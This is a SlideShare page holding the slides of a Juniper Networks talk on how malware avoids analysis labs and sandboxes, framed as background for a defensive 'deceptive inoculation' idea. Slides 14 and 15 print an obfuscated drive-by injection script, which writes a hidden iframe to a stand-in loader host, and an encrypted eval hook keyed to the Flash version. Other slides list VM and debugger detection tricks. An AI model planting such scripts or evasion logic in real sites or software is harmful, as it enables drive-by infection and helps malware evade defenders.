[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensionsZoltan Balazs
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Basics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingMuhammad Khizer Javed
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface DevicePositive Hack Days
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...Orbid
 
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVIncident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVAlexander Sverdlov
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZeditsRod Soto
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Mazin Ahmed
 
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox AnalysisAdvanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysissecurityxploded
 

Similar to Thinking Outside the Sand[box] (20)

Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 
CheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botCheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving bot
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
Setup Your Personal Malware Lab
Setup Your Personal Malware LabSetup Your Personal Malware Lab
Setup Your Personal Malware Lab
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
Basics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty Hunting
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
WatchGuard - Cryptolocker en het gevecht tegen IT 's grootste vijand - Orbid ...
 
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVIncident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZedits
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox AnalysisAdvanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
 

More from Juniper Networks

Why Juniper, Driven by Mist AI, Leads the Market
Why Juniper, Driven by Mist AI, Leads the Market Why Juniper, Driven by Mist AI, Leads the Market
Why Juniper, Driven by Mist AI, Leads the MarketJuniper Networks
 
Experience the AI-Driven Enterprise
Experience the AI-Driven EnterpriseExperience the AI-Driven Enterprise
Experience the AI-Driven EnterpriseJuniper Networks
 
How AI Simplifies Troubleshooting Your WAN
How AI Simplifies Troubleshooting Your WANHow AI Simplifies Troubleshooting Your WAN
How AI Simplifies Troubleshooting Your WANJuniper Networks
 
Real AI. Real Results. Mist AI Customer Testimonials.
Real AI. Real Results. Mist AI Customer Testimonials.Real AI. Real Results. Mist AI Customer Testimonials.
Real AI. Real Results. Mist AI Customer Testimonials.Juniper Networks
 
Are you able to deliver reliable experiences for connected devices
Are you able to deliver reliable experiences for connected devicesAre you able to deliver reliable experiences for connected devices
Are you able to deliver reliable experiences for connected devicesJuniper Networks
 
Stop Doing These 5 Things with Your SD-WAN
Stop Doing These 5 Things with Your SD-WANStop Doing These 5 Things with Your SD-WAN
Stop Doing These 5 Things with Your SD-WANJuniper Networks
 
Securing IoT at Scale Requires a Holistic Approach
Securing IoT at Scale Requires a Holistic ApproachSecuring IoT at Scale Requires a Holistic Approach
Securing IoT at Scale Requires a Holistic ApproachJuniper Networks
 
Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?Juniper Networks
 
Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?Juniper Networks
 
Juniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCOJuniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCOJuniper Networks
 
SDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider OrganizationSDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider OrganizationJuniper Networks
 
Navigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's PerspectiveNavigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's PerspectiveJuniper Networks
 
vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks Juniper Networks
 
NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud Juniper Networks
 
Juniper SRX5800 Infographic
Juniper SRX5800 InfographicJuniper SRX5800 Infographic
Juniper SRX5800 InfographicJuniper Networks
 
Infographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer SatisfactionInfographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer SatisfactionJuniper Networks
 
Infographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning FastInfographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning FastJuniper Networks
 
High performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computingHigh performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computingJuniper Networks
 

More from Juniper Networks (20)

Why Juniper, Driven by Mist AI, Leads the Market
Why Juniper, Driven by Mist AI, Leads the Market Why Juniper, Driven by Mist AI, Leads the Market
Why Juniper, Driven by Mist AI, Leads the Market
 
Experience the AI-Driven Enterprise
Experience the AI-Driven EnterpriseExperience the AI-Driven Enterprise
Experience the AI-Driven Enterprise
 
How AI Simplifies Troubleshooting Your WAN
How AI Simplifies Troubleshooting Your WANHow AI Simplifies Troubleshooting Your WAN
How AI Simplifies Troubleshooting Your WAN
 
Real AI. Real Results. Mist AI Customer Testimonials.
Real AI. Real Results. Mist AI Customer Testimonials.Real AI. Real Results. Mist AI Customer Testimonials.
Real AI. Real Results. Mist AI Customer Testimonials.
 
SD-WAN, Meet MARVIS.
SD-WAN, Meet MARVIS.SD-WAN, Meet MARVIS.
SD-WAN, Meet MARVIS.
 
Are you able to deliver reliable experiences for connected devices
Are you able to deliver reliable experiences for connected devicesAre you able to deliver reliable experiences for connected devices
Are you able to deliver reliable experiences for connected devices
 
Stop Doing These 5 Things with Your SD-WAN
Stop Doing These 5 Things with Your SD-WANStop Doing These 5 Things with Your SD-WAN
Stop Doing These 5 Things with Your SD-WAN
 
Securing IoT at Scale Requires a Holistic Approach
Securing IoT at Scale Requires a Holistic ApproachSecuring IoT at Scale Requires a Holistic Approach
Securing IoT at Scale Requires a Holistic Approach
 
Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?Smart Solutions for Smart Communities: What's Next & Who's Responsible?
Smart Solutions for Smart Communities: What's Next & Who's Responsible?
 
What's Your IT Alter Ego?
What's Your IT Alter Ego?What's Your IT Alter Ego?
What's Your IT Alter Ego?
 
Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?Are You Ready for Digital Cohesion?
Are You Ready for Digital Cohesion?
 
Juniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCOJuniper vSRX - Fast Performance, Low TCO
Juniper vSRX - Fast Performance, Low TCO
 
SDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider OrganizationSDN and NFV: Transforming the Service Provider Organization
SDN and NFV: Transforming the Service Provider Organization
 
Navigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's PerspectiveNavigating the Uncertain World Facing Service Providers - Juniper's Perspective
Navigating the Uncertain World Facing Service Providers - Juniper's Perspective
 
vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks vSRX Buyer’s Guide infographic - Juniper Networks
vSRX Buyer’s Guide infographic - Juniper Networks
 
NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud NFV Solutions for the Telco Cloud
NFV Solutions for the Telco Cloud
 
Juniper SRX5800 Infographic
Juniper SRX5800 InfographicJuniper SRX5800 Infographic
Juniper SRX5800 Infographic
 
Infographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer SatisfactionInfographic: 90% MetaFabric Customer Satisfaction
Infographic: 90% MetaFabric Customer Satisfaction
 
Infographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning FastInfographic: Whack Hackers Lightning Fast
Infographic: Whack Hackers Lightning Fast
 
High performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computingHigh performance data center computing using manageable distributed computing
High performance data center computing using manageable distributed computing
 

Recently uploaded

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 

Recently uploaded (20)

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 

Thinking Outside the Sand[box]

  • 1. Thinking Outside the[Sand]box Kyle Adams - Juniper Networks This presentation is for educational purposes only
  • 2. Introduction Chief Software Architect for Junos Web App Secure “Junos Web App Secure is a security deception technology designed to lace web applications with honeypots on-the-fly” More recently, leading efforts in malware research. Can’t share exactly why, but I can share some interesting ideas that have surfaced as a result.
  • 3. Primary Goal Inoculate your machine from infection by specific classes of malware
  • 4. Background • Malware Analysis Background Malware Collection Techniques o Malware Analysis Techniques o Signature Development o • Malware Authoring ROI o o • o Malware ROI Optimizing for Success Hypothetical Example Evasion o o Distribution Evasion Sandbox Evasion
  • 5. Background / Malware Collection How do analysts get malware samples? • • • • • • Web Crawlers Torrents Usenet Malware Repositories Email Droppers
  • 6. Background / Malware Analysis How do malware analysts inspect malware? • • • Static File Analysis Virtual Machine Sandboxing Code Emulation Sandboxing
  • 7. Background / Signatures How do malware signatures get created? 1. Get a sample 2. Analyze it for unique behaviors - Generate heuristic behavior signature 3. Analyze it for unique data patterns Generate file data signature 4. Distribute new signatures to customers 5. Remove old unnecessary signatures
  • 8. Background / Malware ROI Uninterrupted Lifecycle: Research Development Testing Distribution Grow Infection Base The infection base grows indefinitely. The more machines infected, the more return the attacker gets for their initial investment. In other words… Time = Money
  • 9. Background / Malware ROI Interrupted Lifecycle: Research Development Testing Distribution Grow Infection Base Signature Published Sample Detected Sample Collected The infection base grows until a signature is published. It then rapidly declines in growth rate and eventually becomes negligible. The more machines infected, the more return the attacker gets for their initial investment. So… Time to DETECTION = Money
  • 10. Background / Optimizing For Success Hypothetical Example: Bob spends 20 hours researching his target environment. Another 20 hours writing some ransomware and testing it. Finally, Bob pays someone to distribute his malware for 50 cents per infection, with a distribution rate of 200 clients per hour. Bob’s ransom is $300 and 10% of his victims will chose to pay. So for every hour Bob’s malware is undetected, he makes: ((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour Assume the infection rate remains constant for 72 hours, and minus Bob’s time at (~$50 an hour), Bob makes a total of $422,800.
  • 11. Background / Optimizing For Success Hypothetical Example: Now assume his malware is detected and a signature is published, dropping the successful ransom collection rate to 1 client per hour. (hours_before_detection * ((200 clients * .1) * $300) - (200 clients * $0.50))) + (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50)) Detection at 6 hours: Bob makes $52,870 Detection at 12 hours: Bob makes $88,500 Detection at 18 hours: Bob makes $120,130 Detection at 24 hours: Bob makes $153,760 So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770. Thats a lot of motivation!
  • 12. Background / Distribution Evasion • • You can’t analyze something you can’t get. You can’t generate signatures if you can’t analyze So if you can avoid serving malware to analysis labs, you can avoid detection and signature distribution. Distribution Evasion Distribute malware only to a select set of targets, narrow enough to exclude analysis labs.
  • 13. Background / Distribution Evasion Distribution Evasion Tactics: • • • • • • • • Don’t serve to search engines (Google, Yahoo, Bing, etc…) Don’t serve to known security lab IPs (Symantec, McAfee, etc…) Don’t serve to an environment you can’t infect (Missing Plugins, Unsupported OS, etc…) Randomly choose not to serve Serve only to specific countries/IP ranges Serve only to known browsers Serve only if referer is whitelisted Serve only once per IP
  • 14. Background / Distribution Evasion Distribution Evasion Implementation: 1. Inject obfuscated drive-by download hook into compromised sites: <script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c-){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]) {p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e="1" d="1"c=""+2+""></3>");</0>',17,17, 'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|wi dth|com|write'.split('|'),0,{}))</script> Deobfuscated, it looks like this: <script type="text/javascript"> var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034"; document.write("<iframe width="1" height="1" src="" + ste + ""></iframe>"); </script> But this does nothing to stop automated crawlers in a research lab.
  • 15. Background / Distribution Evasion Distribution Evasion Implementation: 2. Add client-side specificity:The malware requires a specific version of flash to exploit a client, so the drive-by code can actually hide itself unless you have that version of flash. <script type="text/javascript"> … encryption/decryption code … eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b471 8585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c404258445119 1b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b171 41e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version)); </script> Now if the lab isn’t using flash version 12.0.0.44, the drive-by iframe will not
  • 16. Background / Distribution Evasion Distribution Evasion Implementation: 3. Add server-side specificity and filtering:The iframe points to a server whose sole purpose is to exploit browsers and serve malware. In addition to picking the right exploit for the target client, it will also not serve malware if specific conditions are not met. • • • • • You’re not a search engine Your IP is not blacklisted, or is in a whitelist You’re using an exploitable OS and browser This is the first time you have loaded the iframe Drive by code has been injected into the domain of your referer Since the research lab doesn't know what conditions the distribution server requires, it is exceptionally difficult to trick it into serving the malware.
  • 17. Background / Sandbox Evasion Sandbox Evasion Tactics: If any of the following are true, do not execute the malware payload: • • • • • • • Significant Clock Skew Debugger is attached Virtual Machine Detected No Internet Connection Unexploitable environment Sandbox Software Detected Sleep statements abort prematurely Sandboxes can only run for a fixed period of time per sample (usually 30-60 seconds), so the malware may try to run longer: • • Long sleep before payload execution Schedule payload execution for some time in the future
  • 18. Background / Sandbox Evasion Sandbox evasion techniques can be grouped into several high level categories: • • • • • Specificity Triggers Detection Interruption Dialogs Any given malware sample may do zero or more of these.
  • 19. Background / Sandbox Evasion Specificity: • • • • • • • Has internet connection Has correct software versions Has correct OS Has expected security policies Public IP is in correct geographical region Clock skew is minimal Account data is present (Gmail, AIM, Facebook, etc…)
  • 20. Background / Sandbox Evasion Specificity: Requires Email Handing app like Outlook or ThunderBird. framework Requires Internet Connection Requires .NET Requires Win 95/98
  • 21. Background / Sandbox Evasion Triggers: • • • • Sleep for several minutes Require multiple executions Wait for one or more reboots Wait for event o User opens .txt file o User launches browser o User switches to battery power o User updates windows o User installs software o User connects to WiFi o HID activity (Mouse, Keyboard, Webcam, Mic)
  • 22. Background / Sandbox Evasion Triggers: Requires browser restart to trigger payload. Require a second execution.
  • 23. Background / Sandbox Evasion Detection: • • • Debugger Hooks Virtual Machines o Registry Keys, Serial Numbers, MAC addresses o Processes, Services, Drivers, Open Ports o VM Specific ASM instructions Sandbox Software o Open Ports, Processes, Files
  • 24. Background / Sandbox Evasion Detection: Themida: Legitimate Software Piracy Protection wrapper designed to detect VM’s and debuggers. Go figure, malware authors use it too. Debugger detection. And hey, they even explained how to turn off SoftIce (just in case you didn’t know how). No Printer?
  • 25. Background / Sandbox Evasion Interruption: • • Analysis Framework Interruption: o Force Reboot or Logout o Enable Firewall / Whitelist C&C servers Screen Capture Interruption o Open dialogs minimized o Open other apps Maximized o Flashing components / Animation o Hidden MouseOver components
  • 26. Background / Sandbox Evasion Interruption: Force a reboot. Screen Shot Evasion: The “Play” button flashes. We got lucky and took the screenshot at the right time.
  • 27. Background / Sandbox Evasion Dialogs:
  • 28. Background / Sandbox Evasion Simple Dialogs: What are they? • Fake Apps o Fake Installers o Fake Errors o • Why? o o o Prevent sandbox analysis Phish for information Legitimize  it looks real, so its probably safe  red flags (UAC, firewall notices, etc…)
  • 29. Background / Sandbox Evasion Simple Dialogs: Legitimize UAC dialogs Require basic human input (click a button)
  • 30. Background / Sandbox Evasion Advanced Dialogs: Require account details TOS acceptance Combination Lock Graphic based dialogs • • • •
  • 31. Background / Sandbox Evasion Advanced Dialogs: Requires password. Presumably available with the download link. Captcha style dialog Fake dialog. This dialog looks similar to the default theme of XP, but is clearly not.
  • 32. Deceptive Inoculation Bottom line, malware takes great care not to run in a sandbox environment. Lets all be sandboxes! (or at least pretend to be)
  • 33. Deceptive Inoculation • Distribution Deception o • Prevent your personal computer from being sent malware in the first place (stop drive-by-downloads). Sandbox Deception o Prevent malware from executing a payload when launched on your personal computer.
